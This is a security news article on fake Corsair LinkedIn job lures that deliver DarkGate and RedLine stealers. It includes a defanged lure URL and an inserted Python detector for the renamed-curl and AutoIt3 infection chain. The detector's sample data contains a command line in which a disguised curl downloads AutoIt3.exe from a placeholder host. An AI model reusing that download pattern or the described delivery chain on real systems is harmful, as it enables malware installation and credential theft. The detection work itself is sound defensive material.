Corsair’s fake LinkedIn job postings push DarkGate malware

The attacker uses fake LinkedIn posts and direct messages about a Facebook advertising specialist position at hardware maker Corsair to trick people into downloading information-stealing malware like DarkGate and RedLine. This is reported by Bleeping Computer.

The cyber security company WithSecure discovered the activity and tracked the group’s activities. The report indicated that it was linked to the Vietnamese cybercrime groups responsible for the Ducktail campaigns first noticed last year.

These campaigns aim to steal valuable business Facebook accounts that can be used for malicious advertising or sold to other cybercriminals.

Recent examples of DarkGate use include phishing attacks via Microsoft Teams that deliver the payload, and compromised Skype accounts used to send VBS scripts that start the infection chain leading to the malware.

The Vietnamese attackers mainly targeted users in the US, UK and India, who hold senior positions in social networks and are likely to have access to Facebook business accounts. The bait is delivered via LinkedIn and contains a job offer at Corsair.

Targets are tricked into downloading malicious files from a URL (g2[.]by/corsair-JD) which redirects to Google Drive or Dropbox to drop a ZIP file containing a PDF file or a DOCX document and a TXT file with the following names:

  • Corsair job description.docx
  • Salary and new products.txt
  • PDF Salary and products.pdf

WithSecure researchers analyzed the metadata for the above files and found the sources of RedLine stealer distribution.

The downloaded archive contains a VBS script, possibly embedded in a DOCX file, that copies “curl.exe” to a new location under a different name and uses it to download “autoit3.exe” and a compiled AutoIt3 script.

The executable runs the script, which de-obfuscates itself and assembles the DarkGate payload from strings present in the script.

30 seconds after installation, the malware attempts to remove security products from the compromised system, suggesting the existence of an automated process.
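As an added example, not code from the article or from WithSecure's report, the following Python detector looks for the chain described above (curl.exe running under another name, followed shortly by AutoIt3 executing a compiled script) over constructed process-creation events; the Sysmon-like field names, the .a3x script extension and the 120-second pairing window are assumptions.

```python
from dataclasses import dataclass

@dataclass
class ProcEvent:
    ts: float           # event time in seconds (constructed)
    image: str          # full path of the started image
    original_name: str  # OriginalFileName from the PE version resource
    cmdline: str        # command line
    parent: str         # parent image path

def _base(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def is_renamed_curl(e: ProcEvent) -> bool:
    """curl.exe copied and started under another file name."""
    return e.original_name.lower() == "curl.exe" and _base(e.image) != "curl.exe"

def is_autoit_loader(e: ProcEvent) -> bool:
    """AutoIt3.exe launched with a compiled script (.a3x extension assumed)."""
    return _base(e.image) == "autoit3.exe" and ".a3x" in e.cmdline.lower()

def find_chain(events, window: float = 120.0):
    """Pair each renamed-curl execution with an AutoIt3 start within `window` seconds."""
    curls = [e for e in events if is_renamed_curl(e)]
    return [(c, a) for a in events if is_autoit_loader(a)
            for c in curls if 0 <= a.ts - c.ts <= window]

# Constructed sample events: benign curl, renamed curl, matching AutoIt3, unrelated AutoIt3.
# Hosts and paths are placeholders, not indicators from the report.
SAMPLE_EVENTS = [
    ProcEvent(10.0, r"C:\Windows\System32\curl.exe", "curl.exe",
              "curl.exe -s https://example.invalid/", r"C:\Windows\System32\cmd.exe"),
    ProcEvent(50.0, r"C:\Users\Public\Data\svchost_update.exe", "curl.exe",
              "svchost_update.exe -o Autoit3.exe http://placeholder.invalid/a",
              r"C:\Windows\System32\wscript.exe"),
    ProcEvent(80.0, r"C:\Users\Public\Data\Autoit3.exe", "AutoIt3.exe",
              "Autoit3.exe script.a3x", r"C:\Windows\System32\wscript.exe"),
    ProcEvent(5000.0, r"C:\Program Files\AutoIt3\AutoIt3.exe", "AutoIt3.exe",
              "AutoIt3.exe backup.a3x", r"C:\Windows\explorer.exe"),
]

if __name__ == "__main__":
    for c, a in find_chain(SAMPLE_EVENTS):
        print(f"renamed curl {c.image} at {c.ts}s, AutoIt3 at {a.ts}s: {a.cmdline}")
```

The same pairing logic applies to real Sysmon Event ID 1 records once the Image, OriginalFileName, CommandLine and ParentImage fields are mapped onto ProcEvent.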

Late last year, LinkedIn introduced anti-abuse features on the platform that can help users identify whether an account is suspicious or fake. However, users should verify the information received before communicating with a new account.

WithSecure has published a list of Indicators of Compromise (IoC) that can help organizations protect against the actions of this malicious actor. Details include IP addresses, domains used, URLs, file metadata, and archive names.
